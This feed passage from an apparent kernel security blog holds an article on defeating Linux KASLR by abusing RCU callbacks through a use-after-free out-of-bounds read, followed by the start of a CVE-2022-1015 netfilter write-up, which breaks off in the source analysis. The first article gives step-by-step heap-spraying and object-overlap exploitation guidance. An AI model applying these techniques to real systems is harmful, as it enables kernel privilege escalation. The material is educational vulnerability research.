<p>If you have any questions feel free to hit me up on Twitter or by email.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[A Use-After-Free in Netfilter leading to Local Privilege Escalation]]></summary></entry><entry><title type="html">Abusing RCU callbacks with a Use-After-Free read to defeat KASLR</title><link href="/abusing_rcu_callbacks_to_defeat_kaslr/" rel="alternate" type="text/html" title="Abusing RCU callbacks with a Use-After-Free read to defeat KASLR" /><published>2023-01-04T14:00:00+00:00</published><updated>2023-01-04T14:00:00+00:00</updated><id>/abusing-rcu-to-defeat-kaslr</id><content type="html" xml:base="/abusing_rcu_callbacks_to_defeat_kaslr/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>In this article, I will be walking you through a clever technique that can be used to leak addresses and defeat KASLR in the Linux Kernel when you have a certain type of Use-After-Free by abusing RCU callbacks. It is by no means a novel technique and has most likely been leveraged in several exploits.</p>

<p>This is a guide meant to give you a solid understanding of the technique as quickly as possible.</p>
<blockquote>
  <p>This article was supposed to come out 2 weeks ago but it was delayed due to the Christmas holidays.</p>
</blockquote>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#technique">The Technique in a nutshell</a></li>
  <li><a href="#criteria">Criteria</a>
    <ul>
      <li><a href="#uaf">A certain type of Use-After-Free</a></li>
      <li><a href="#oobread">A specific OOB read</a></li>
      <li><a href="#spray">Ability to spray objects</a></li>
    </ul>
  </li>
  <li><a href="#analysis">Analysis</a>
    <ul>
      <li><a href="#reading_primitive">Reading Primitive</a>
        <ul>
          <li><a href="#user_key_payload">user_key_payload</a></li>
          <li><a href="#posix_msg_tree_node">posix_msg_tree_node</a></li>
          <li><a href="#msg_msg">msg_msg</a></li>
        </ul>
      </li>
      <li><a href="#frankenstein">Frankensteining everything together</a></li>
    </ul>
  </li>
  <li><a href="#resources">Resources</a></li>
  <li><a href="#summary">Summary</a></li>
</ol>

<h2 id="the-technique-in-a-nutshell-">The Technique in a nutshell <a name="technique"></a></h2>
<p>The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have a <code class="language-plaintext highlighter-rouge">rcu_head</code> as its first member.</p>

<p>If we make a call to update the second object the kernel will call <code class="language-plaintext highlighter-rouge">call_rcu</code> which will populate <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func()</code>. Then if we can read OOB through the first object into the second object’s <code class="language-plaintext highlighter-rouge">rcu_head</code> without sleeping (as to not let the kernel execute <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func()</code> which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func()</code> therefore defeating KASLR.</p>

<p>Now that we have a general summary of the technique it is time to go more in-depth.</p>

<h2 id="criteria-">Criteria <a name="criteria"></a></h2>
<p>We have some criteria that have to be met to be able to use this technique.</p>

<h3 id="a-certain-type-of-use-after-free-">A certain type of Use-After-Free <a name="uaf"></a></h3>
<p>This technique applies to objects that meet the following requirements:</p>
<ul>
  <li>The object that gets UAF’d must be in a linked list.</li>
  <li>The <code class="language-plaintext highlighter-rouge">list_head</code> of the object must be at offset 16 bytes or more relative to the start of the object.</li>
  <li>You must be able to get multiple objects that get UAF’d in a linked list with one another.</li>
</ul>

<h3 id="a-specific-oob-read-">A specific OOB read <a name="oobread"></a></h3>
<p>We need to have a primitive capable of reading at least 16 bytes out-of-bounds for the slab object. However, it is important to mention that read sizes cannot go over the size limit of the slab cache. So if you are reading from an object in kmalloc-64 you can read up to 64 bytes before the kernel detects the memory leak if the option <code class="language-plaintext highlighter-rouge">CONFIG_HARDENED_USERCOPY</code> is on (and chances are it is on the target). This means that your read needs to start at offset 16 bytes from the start of the slab object to be able to read 16 bytes out-of-bounds.</p>

<blockquote>
  <p>Ex: If you have a <code class="language-plaintext highlighter-rouge">kmalloc-64</code> slab object that occupies the address space from address <code class="language-plaintext highlighter-rouge">0x20</code> to address <code class="language-plaintext highlighter-rouge">0x60</code> your read must start at offset <code class="language-plaintext highlighter-rouge">0x30</code> to be able to read 16 bytes out-of-bounds for the slab object (up to <code class="language-plaintext highlighter-rouge">0x70</code>).</p>
</blockquote>

<p>It might be a little difficult to find OOB read primitives like this but they exist even if somewhat conditionally (those OOB reads could only be achieved if the previous conditions about the type of Use-After-Free are met). More on that later.</p>

<h3 id="ability-to-spray-objects-">Ability to spray objects <a name="spray"></a></h3>
<p>We need to be able to spray objects that have <code class="language-plaintext highlighter-rouge">rcu_head</code> as their first member. We must also be able to ‘update’ those objects.</p>

<blockquote>
  <p>The objects that will be sprayed must be allocated with the same GFP flag as the primitive that is used for reading. Otherwise, they won’t be allocated in the same caches.</p>
</blockquote>

<h2 id="analysis-">Analysis <a name="analysis"></a></h2>
<p>I will provide a simple (fake) example case and go over how the technique could be applied.</p>
<blockquote>
  <p>For a real case where this technique is used: I have a write-up coming out soon of a vulnerability where I use this very trick to leak an address and bypass KASLR.</p>
</blockquote>

<p>Let’s have a type <code class="language-plaintext highlighter-rouge">vuln_obj</code></p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">vuln_obj</span> <span class="p">{</span>
	<span class="kt">uint64_t</span> <span class="n">int1</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">uint64_t</span> <span class="n">int2</span><span class="p">;</span> <span class="c1">// @8</span>
	<span class="kt">uint64_t</span> <span class="n">int3</span><span class="p">;</span> <span class="c1">// @16</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">list</span><span class="p">;</span> <span class="c1">// @24 - matches the requirement for the list_head </span>
	<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">data</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> <span class="c1">// @40</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We can freely make calls to the kernel that will allocate this structure with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code>. All objects of this type are allocated in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> and all objects of this type are in a linked list together. We can also make calls to free structures of this type. However, the kernel does not unlink the object that gets freed from the linked list.</p>

<p>This is our vulnerability: a <code class="language-plaintext highlighter-rouge">vuln_obj</code> object gets freed but it is not removed from the linked list and the previous and next objects in the list hold pointers to it. This causes a Use-After-Free and <code class="language-plaintext highlighter-rouge">vuln_obj</code> meets all the criteria we set prior.</p>

<h3 id="read-primitive-">Read Primitive <a name="reading_primitive"></a></h3>
<p>Now that we have introduced our example vulnerable object we need to look for a read primitive that matches the conditions we set earlier.</p>

<p>A primitive like that won’t be found just laying around - we need to work a bit to get it. Our <code class="language-plaintext highlighter-rouge">vuln_obj</code> is allocated in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> so we are looking for objects that get allocated in that slab cache. In this example, we are going to be leveraging objects belonging to the <strong>in-kernel key management and retention facility</strong> and the <strong>message queue</strong> system of the kernel.</p>

<h4 id="user_key_payload-">user_key_payload <a name="user_key_payload"></a></h4>
<p>Objects of type <code class="language-plaintext highlighter-rouge">user_key_payload</code> hold the payload of <strong>user and logon keys</strong>. This type plays the main role in our story.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/keys/user-type.h */</span>
<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">rcu_head</span>	<span class="n">rcu</span><span class="p">;</span>		<span class="cm">/* RCU destructor */</span> <span class="c1">// @0 - 16 bytes</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>	<span class="n">datalen</span><span class="p">;</span>	<span class="cm">/* length of payload */</span> <span class="c1">// @16 - 2 bytes</span>
	<span class="kt">char</span>		<span class="n">data</span><span class="p">[]</span> <span class="n">__aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">));</span> <span class="cm">/* actual payload */</span> <span class="c1">// @24</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">callback_head</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">func</span><span class="p">)(</span><span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">head</span><span class="p">);</span> <span class="c1">// @8 rcu_head-&gt;func </span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))));</span>
<span class="cp">#define rcu_head callback_head
</span></code></pre></div></div>
<p>This object will be the one we will leak KASLR through (by reading the <code class="language-plaintext highlighter-rouge">rcu-&gt;func</code> pointer at offset 16 bytes).</p>

<h4 id="posix_msg_tree_node-">posix_msg_tree_node <a name="posix_msg_tree_node"></a></h4>
<p>In the message queue subsystem, all the messages (<code class="language-plaintext highlighter-rouge">struct msg_msg</code>) belonging to a certain queue are in a linked list together. The start (the root) of the queue is a <code class="language-plaintext highlighter-rouge">struct posix_msg_tree_node</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">posix_msg_tree_node</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">rb_node</span>      <span class="n">rb_node</span><span class="p">;</span> <span class="c1">// of size 0x18 = 24 bytes</span>
    <span class="k">struct</span> <span class="n">list_head</span>    <span class="n">msg_list</span><span class="p">;</span> <span class="c1">// @24 (is 16 bytes)</span>
    <span class="kt">int</span>         <span class="n">priority</span><span class="p">;</span> <span class="c1">// @40</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">rb_node</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span>  <span class="n">__rb_parent_color</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_right</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_left</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))));</span>
</code></pre></div></div>
<p>It is allocated with the <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> flag and as such will be allocated in the same caches as our <code class="language-plaintext highlighter-rouge">vuln_obj</code>.</p>
<blockquote>
  <p>However interestingly enough messages in the queue are allocated with the flag GFP_KERNEL_ACCOUNT and reside in the kmalloc-cg-n caches. So in our case msg_msg is not a viable primitive.</p>
</blockquote>

<p>We do not possess direct control over objects of this type but we can freely allocate them by creating message queues.</p>
<blockquote>
  <p>Technically the posix_msg_tree_node for each queue gets initiated whenever the first message is added to the queue and not when the queue is created.</p>
</blockquote>

<p>Lets check how <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> overlaps over <code class="language-plaintext highlighter-rouge">vuln_obj</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Obj: vuln_obj ; posix_msg_tree_node
@0:  int1     ; _rb_parent_color
@8:  int2     ; *rb_right
@16: int3     ; *rb_left
@24: list     ; msg_list 
</code></pre></div></div>
<p>Here <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> is suitable as a primitive because the linked list <code class="language-plaintext highlighter-rouge">msg_list</code> aligns with <code class="language-plaintext highlighter-rouge">vuln_obj.list</code> (at offset 24 bytes).</p>

<p>If we manage to allocate <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> in the same slab object where a <code class="language-plaintext highlighter-rouge">vuln_obj</code> used to reside we could influence the <code class="language-plaintext highlighter-rouge">msg_list-&gt;*next</code> and <code class="language-plaintext highlighter-rouge">msg_list-&gt;*prev</code> via the use-after-free (by initiating other <code class="language-plaintext highlighter-rouge">vuln_obj</code> objects).</p>

<h4 id="msg_msg-">msg_msg <a name="msg_msg"></a></h4>
<p>This structure holds messages belonging to the message queue system of the kernel.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* one msg_msg structure for each message */</span>
<span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span> <span class="c1">// @16</span>
	<span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>	<span class="c1">// @24	/* message text size */</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @32</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span> <span class="c1">// @40</span>
	<span class="cm">/* the actual message follows immediately */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It is important to note:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">*security</code> must always hold a valid address to heap memory</li>
  <li>The <code class="language-plaintext highlighter-rouge">list_head</code> of the linked list with all the messages in the queue is <strong>at the start</strong> of the object (in contrast to <code class="language-plaintext highlighter-rouge">vuln_obj</code> where it is at offset 24 bytes).</li>
</ul>

<h3 id="frankensteining-everything-together-">Frankensteining everything together <a name="frankenstein"></a></h3>
<p>Now that we have introduced the objects we need to <strong>frankenstein</strong> them together to achieve the OOB read we need to leak KASLR.</p>

<p>To achieve that we have to do the following:</p>
<ul>
  <li>Make a call to allocate a <code class="language-plaintext highlighter-rouge">vuln_obj</code> object and free it (we shall call this Object 1).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> of a queue at the UAF’d (Object 1) location.</li>
  <li>Initiate a new <code class="language-plaintext highlighter-rouge">vuln_obj</code> that gets UAF’d (Object 2). The address of <code class="language-plaintext highlighter-rouge">vuln_obj.list</code> will get written in <code class="language-plaintext highlighter-rouge">posix_msg_tree_node.msg_list.next</code> so the kernel will be fooled to believe that the first message in the message queue starts at <code class="language-plaintext highlighter-rouge">vuln_obj.list</code>. However <code class="language-plaintext highlighter-rouge">vuln_obj.list</code> is at an offset of 24 bytes while <code class="language-plaintext highlighter-rouge">msg_msg.m_list</code> is at an offset of 0 bytes from the start of the slab object. Therefore we can get 24 bytes of OOB read by reading the first message in the queue. (take a look at diagram for clarity)</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">user_key_payload</code> where <em>Object 2</em> used to be and pass valid heap addresses for <code class="language-plaintext highlighter-rouge">m_list-&gt;next</code> and <code class="language-plaintext highlighter-rouge">m_list-&gt;prev</code> (you need to have leaked a heap address for this - out of scope for this article but could be easily done in our example).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">user_key_payload</code> right under <em>Object 2</em> (this is the payload object whose <code class="language-plaintext highlighter-rouge">rcu-&gt;func</code> we leak).</li>
  <li>Make a call to change the <code class="language-plaintext highlighter-rouge">user_key_payload</code> that is allocated under <em>Object 2</em>.</li>
  <li>Immediately make a call to fetch the first message in the message queue (with a bit of luck <code class="language-plaintext highlighter-rouge">rcu-&gt;func()</code> wouldn’t have been called yet).</li>
  <li>And we have the <code class="language-plaintext highlighter-rouge">.text</code> address - defeating KASLR.</li>
</ul>

<blockquote>
  <p>This is a simplification. In reality, to do this reliably you need to spray a ton of <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects to get one right under Object 2. Then you need to mass edit all the payloads and then fetch the first message in the queue.</p>
</blockquote>

<blockquote>
  <p>We said prior that <code class="language-plaintext highlighter-rouge">*security</code> always needs to hold a valid heap address. We don’t have to worry about that as it will overlap with <code class="language-plaintext highlighter-rouge">rcu_head-&gt;next</code>.</p>
</blockquote>

<p><img src="https://i.imgur.com/oQMWv87.png" alt="diagram" /></p>

<h2 id="resources-">Resources <a name="resources"></a></h2>
<p>Some resources you might want to check out.</p>

<ol>
  <li><a href="https://www.kernel.org/doc/Documentation/RCU/whatisRCU.txt">What is RCU?</a></li>
  <li><a href="https://man7.org/linux/man-pages/man7/mq_overview.7.html">mq_overview</a></li>
  <li><a href="https://man7.org/linux/man-pages/man7/keyrings.7.html">keyrings</a></li>
</ol>

<h2 id="summary-">Summary <a name="summary"></a></h2>
<p>I provided an example which allows the use of this technique. The fake example is very close to the real application of the technique in my next vulnerability write-up (which should be coming out in the next week or two).</p>

<p>I believe the analysis and explanation are not too difficult to grasp but if you have questions feel free to reach out to me.</p>

<p>Keep an eye out for when the write-up drops if you are interested in the <em>“real life”</em> application.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Introduction In this article, I will be walking you through a clever technique that can be used to leak addresses and defeat KASLR in the Linux Kernel when you have a certain type of Use-After-Free by abusing RCU callbacks. It is by no means a novel technique and has most likely been leveraged in several exploits.]]></summary></entry><entry><title type="html">CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation</title><link href="/cve-2022-1015/" rel="alternate" type="text/html" title="CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation" /><published>2022-11-11T10:00:00+00:00</published><updated>2022-11-11T10:00:00+00:00</updated><id>/cve-2022-1015</id><content type="html" xml:base="/cve-2022-1015/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>Hello there! Today we will be reviewing and exploring a vulnerability in the Linux kernel framework Netfilter.</p>

<p>This is meant to be a <em>write-up</em> as much as it is meant to be educational material for the people just getting into the kernel vulnerability research space. I attempt to go over everything and not leave anything unexplained so it can be accessible to everyone - including those with little to no experience in vulnerability research. However, knowledge of Linux, assembly and C is implied.</p>

<p>I recommend reading my article <a href="https://ysanatomic.github.io/netfilter_nf_tables/">Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables</a> before undertaking this write-up so you have a general idea of the internals of nf_tables.</p>

<p>When I decided that I want to explore and review vulnerabilities in the Netfilter framework I came across <a href="https://twitter.com/pqlqpql">David Bouman’s</a> <a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/">write-up</a> of this very vulnerability. 
As the vulnerability proved quite interesting I decided to also do a write-up reviewing it in <strong>more</strong> detail as well as go through the process of developing the exploit for it <strong>more</strong> in-depth. My article can be quite similar to his at some times but also diverges greatly at others - namely in the exploitation stage.</p>

<p>The write-up is based on my notes that I was taking while exploring the vulnerability and trying to exploit it so there might be parts where I take the wrong way or talk about the things I missed or did incorrectly at first before figuring it out. I decided to leave those parts in the write-up as they can prove to be educational.</p>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#vuln">The Vulnerability</a>
    <ul>
      <li><a href="#rootcause">Root cause</a></li>
      <li><a href="#parserfunc">Parser Functions</a></li>
      <li><a href="#regtranslation">Register translation</a></li>
      <li><a href="#validationfunc">Validation functions</a></li>
      <li><a href="#bigbut">A big “but”</a></li>
    </ul>
  </li>
  <li><a href="#exploitation">Exploitation</a>
    <ul>
      <li><a href="#primitives">Primitives?</a>
        <ul>
          <li><a href="#imm">nft_immediate_expr</a></li>
          <li><a href="#payload">nft_payload</a></li>
          <li><a href="#payloadset">nft_payload_set</a></li>
          <li><a href="#bitwise">nft_bitwise</a></li>
        </ul>
      </li>
      <li><a href="#explstrat">An Exploitation strategy</a></li>
      <li><a href="#leakingkaddr">Leaking a kernel address</a>
        <ul>
          <li><a href="#nft_do_chain">nft_do_chain</a></li>
          <li><a href="#scoutingkaddr">Scouting for a kernel address</a></li>
          <li><a href="#leakingkaddr">Leaking the address</a></li>
        </ul>
      </li>
      <li><a href="#ceroad">Road to Code Execution</a>
        <ul>
          <li><a href="#outputudp">Output hook + UDP packet</a></li>
          <li><a href="#otherhooks">Trying the other hooks</a></li>
          <li><a href="#expltcp">Exploitation vector through TCP</a></li>
        </ul>
      </li>
      <li><a href="#ropchain">Building an ROP chain</a>
        <ul>
          <li><a href="#prepare_kernel_cred">prepare_kernel_cred</a></li>
          <li><a href="#commit_creds">commit_creds</a></li>
          <li><a href="#switch_task_namespaces">switch_task_namespaces</a></li>
          <li><a href="#swapgs">swapgs_restore_regs_and_return_to_usermode</a></li>
          <li><a href="#summ">Summarizing the ROP chain</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li><a href="#poc">Proof-of-Concept</a></li>
  <li><a href="#closing">Closing Remarks</a></li>
</ol>

<h2 id="the-vulnerability-">The Vulnerability <a name="vuln"></a></h2>
<p>The vulnerability is in <code class="language-plaintext highlighter-rouge">nf_tables</code> portion of the netfilter framework. The exact description for CVE-2022-1015 is:</p>
<blockquote>
  <p>A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.</p>
</blockquote>

<p>I will again recommend reading my article providing an introduction to <em>nf_tables</em> as it provides a good base to be able to understand the vulnerability.</p>

<h3 id="root-cause-">Root cause <a name="rootcause"></a></h3>
<p>The root cause of the vulnerability is in the functions <code class="language-plaintext highlighter-rouge">nft_validate_register_store</code> and <code class="language-plaintext highlighter-rouge">nft_validate_register_load</code>. They validate that register indexes and data that is to be written(stored) or read(loaded) is within bounds of the registers. 
However, before we take a look at them we will first take a look at the <strong>parsing</strong> functions - <code class="language-plaintext highlighter-rouge">nft_parse_register_store</code> and <code class="language-plaintext highlighter-rouge">nft_parse_register_load</code> which call the two validating functions.</p>

<h4 id="parser-functions-">Parser functions <a name="parserfunc"></a></h4>
<p>The parsing functions are responsible for <em>parsing</em> values from netlink attributes to register indexes and calling the validation functions.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* net/netfilter/nf_tables_api.c */</span>
<span class="kt">int</span> <span class="nf">nft_parse_register_load</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u8</span> <span class="o">*</span><span class="n">sreg</span><span class="p">,</span> <span class="n">u32</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">u32</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// 4 byte register variable</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

	<span class="n">reg</span> <span class="o">=</span> <span class="n">nft_parse_register</span><span class="p">(</span><span class="n">attr</span><span class="p">);</span> <span class="c1">// gets the register index from an attribute</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">nft_validate_register_load</span><span class="p">(</span><span class="n">reg</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span> <span class="c1">// calls the validating function</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="c1">// if the validating function didn't return an error everything is fine</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>

	<span class="o">*</span><span class="n">sreg</span> <span class="o">=</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// save the register index into sreg (a pointer that is provided as an argument)</span>
	<span class="c1">// sreg = source register -&gt; the register from which we read</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL_GPL</span><span class="p">(</span><span class="n">nft_parse_register_load</span><span class="p">);</span>

<span class="kt">int</span> <span class="nf">nft_parse_register_store</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
			     <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u8</span> <span class="o">*</span><span class="n">dreg</span><span class="p">,</span>
			     <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_data</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span>
			     <span class="k">enum</span> <span class="n">nft_data_types</span> <span class="n">type</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// 4 byte register variable</span>

	<span class="n">reg</span> <span class="o">=</span> <span class="n">nft_parse_register</span><span class="p">(</span><span class="n">attr</span><span class="p">);</span> <span class="c1">// parsed from an attribute</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">nft_validate_register_store</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">type</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
	<span class="cm">/* here we pass a bit more arguments to the validating function */</span>
	<span class="cm">/* because we are going to be writing into the registers and not reading from them */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>

	<span class="o">*</span><span class="n">dreg</span> <span class="o">=</span> <span class="n">reg</span><span class="p">;</span> <span class="c1">// once again saves the register index into dreg</span>
	<span class="c1">// dreg = destination register -&gt; the register in which we write</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In the code above the <code class="language-plaintext highlighter-rouge">reg</code> variable is <code class="language-plaintext highlighter-rouge">u32</code>, 32-bit integer, while the <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">dreg</code> pointers are for <code class="language-plaintext highlighter-rouge">u8</code> variables, so they are 8-bit. This of course makes sense if you know how the registers work. The total register space is <code class="language-plaintext highlighter-rouge">0x50 = 80</code> bytes. So there is no reason to save more than the least significant byte after validation - if the register index is in-bounds it should always fit in those 8-bits.</p>

<h4 id="register-translation-">Register translation <a name="regtranslation"></a></h4>
<p>Now before we go into detail on the validation functions let’s first look at the register offsets and the enum type that we have. This section could be skipped if you have a really good understanding of how register offsets are handled and translated in netfilter. However, I recommend reading as it will be important later on.</p>

<p>So if you have read my article on <code class="language-plaintext highlighter-rouge">nf_tables</code> you should know that there are two types of register offsets for the data section of the registers. There used to be only four 16-byte registers. Then those registers turned into sixteen 4-byte ones. However, due to compatibility reasons, the 16-byte register offsets also stayed. So the registers can be viewed as a single buffer with two types of offsets.</p>

<p><img src="https://i.imgur.com/93aKEAi.png" alt="regs_schematic.png" /></p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span> <span class="n">nft_registers</span> <span class="p">{</span>
	<span class="n">NFT_REG_VERDICT</span><span class="p">,</span>
	<span class="n">NFT_REG_1</span><span class="p">,</span>
	<span class="n">NFT_REG_2</span><span class="p">,</span>
	<span class="n">NFT_REG_3</span><span class="p">,</span>
	<span class="n">NFT_REG_4</span><span class="p">,</span>
	<span class="n">__NFT_REG_MAX</span><span class="p">,</span>

	<span class="n">NFT_REG32_00</span>	<span class="o">=</span> <span class="mi">8</span><span class="p">,</span>
	<span class="n">NFT_REG32_01</span><span class="p">,</span>
	<span class="n">NFT_REG32_02</span><span class="p">,</span>
	<span class="p">...</span>
	<span class="n">NFT_REG32_13</span><span class="p">,</span>
	<span class="n">NFT_REG32_14</span><span class="p">,</span>
	<span class="n">NFT_REG32_15</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Taking a look at the enum type we can see how both types of offsets exist in it. <code class="language-plaintext highlighter-rouge">NFT_REG_VERDICT</code> points to zero and <code class="language-plaintext highlighter-rouge">NFT_REG_1</code> to <code class="language-plaintext highlighter-rouge">NFT_REG_4</code> point to indexes from one to four.
We see how <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> is defined as eight so <code class="language-plaintext highlighter-rouge">NFT_REG32_01</code> is nine and so on and so forth.</p>

<p>So now what happens is a translation in the <code class="language-plaintext highlighter-rouge">nft_parse_register</code> function.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* net/netfilter/nf_tables_api.c */</span>
<span class="cm">/**
 *	nft_parse_register - parse a register value from a netlink attribute
 *
 *	@attr: netlink attribute
 *
 *	Parse and translate a register value from a netlink attribute.
 *	Registers used to be 128 bit wide, these register numbers will be
 *	mapped to the corresponding 32 bit register numbers.
 */</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">nft_parse_register</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">reg</span><span class="p">;</span>

	<span class="c1">// from include/uapi/linux/netfilter/nf_tables.h</span>
	<span class="c1">// NFT_REG_SIZE = 16 (16 bytes)</span>
	<span class="c1">// NFT_REG32_SIZE = 4 (4 bytes)</span>
	<span class="n">reg</span> <span class="o">=</span> <span class="n">ntohl</span><span class="p">(</span><span class="n">nla_get_be32</span><span class="p">(</span><span class="n">attr</span><span class="p">));</span>
	<span class="k">switch</span> <span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">NFT_REG_VERDICT</span><span class="p">...</span><span class="n">NFT_REG_4</span><span class="p">:</span>
		<span class="k">return</span> <span class="n">reg</span> <span class="o">*</span> <span class="n">NFT_REG_SIZE</span> <span class="o">/</span> <span class="n">NFT_REG32_SIZE</span><span class="p">;</span> 
	<span class="nl">default:</span>
		<span class="k">return</span> <span class="n">reg</span> <span class="o">+</span> <span class="n">NFT_REG_SIZE</span> <span class="o">/</span> <span class="n">NFT_REG32_SIZE</span> <span class="o">-</span> <span class="n">NFT_REG32_00</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
